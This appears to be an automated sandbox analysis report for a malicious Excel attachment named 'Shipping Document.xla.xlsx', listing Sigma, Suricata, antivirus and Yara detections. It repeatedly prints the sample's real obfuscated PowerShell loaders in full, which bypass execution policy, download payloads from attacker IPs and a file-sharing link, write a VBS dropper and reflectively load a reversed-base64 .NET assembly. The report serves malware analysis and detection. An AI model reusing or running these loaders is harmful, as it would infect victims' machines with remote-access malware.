Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", ProcessId: 3988, ProcessName: csc.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 152.231.102.107, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3784, TargetFilename: C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 152.231.102.107, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssem

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssembly = [Syste'+'m.R'+'eflection.Assembly]::Load(e3'+'IcommandBytes);e3IvaiMethod '+'= [dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssem

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewhichgivenbestdesignforyourth.vBs" , ProcessId: 1808, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3784, TargetFilename: C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3344, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", CommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmK

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3784, TargetFilename: C:\Users\user\AppData\Local\Temp\lag13pa5.rx0.ps1

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", ProcessId: 3988, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T15:49:02.095986+0100	2024197	1	A Network Trojan was detected	107.172.44.175	80	192.168.2.22	49164	TCP
2024-11-26T15:49:07.144795+0100	2024197	1	A Network Trojan was detected	107.172.44.175	80	192.168.2.22	49166	TCP

ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T15:49:02.095969+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49164	107.172.44.175	80	TCP
2024-11-26T15:49:07.144771+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49166	107.172.44.175	80	TCP

ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T15:48:58.373937+0100	2057635	1	A Network Trojan was detected	107.172.44.175	80	192.168.2.22	49169	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T15:49:29.759254+0100	2049038	1	A Network Trojan was detected	193.30.119.205	443	192.168.2.22	49168	TCP

ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T15:48:58.373937+0100	2858295	1	A Network Trojan was detected	107.172.44.175	80	192.168.2.22	49169	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-26T15:49:16.286145+0100	2858795	1	A Network Trojan was detected	192.168.2.22	49167	107.172.44.175	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Shipping Document.xla.xlsx

ReversingLabs: Detection: 21%

Machine Learning detection for sample

Source: Shipping Document.xla.xlsx

Joe Sandbox ML: detected

Phishing

Yara detected HtmlPhish44

Source: Yara match

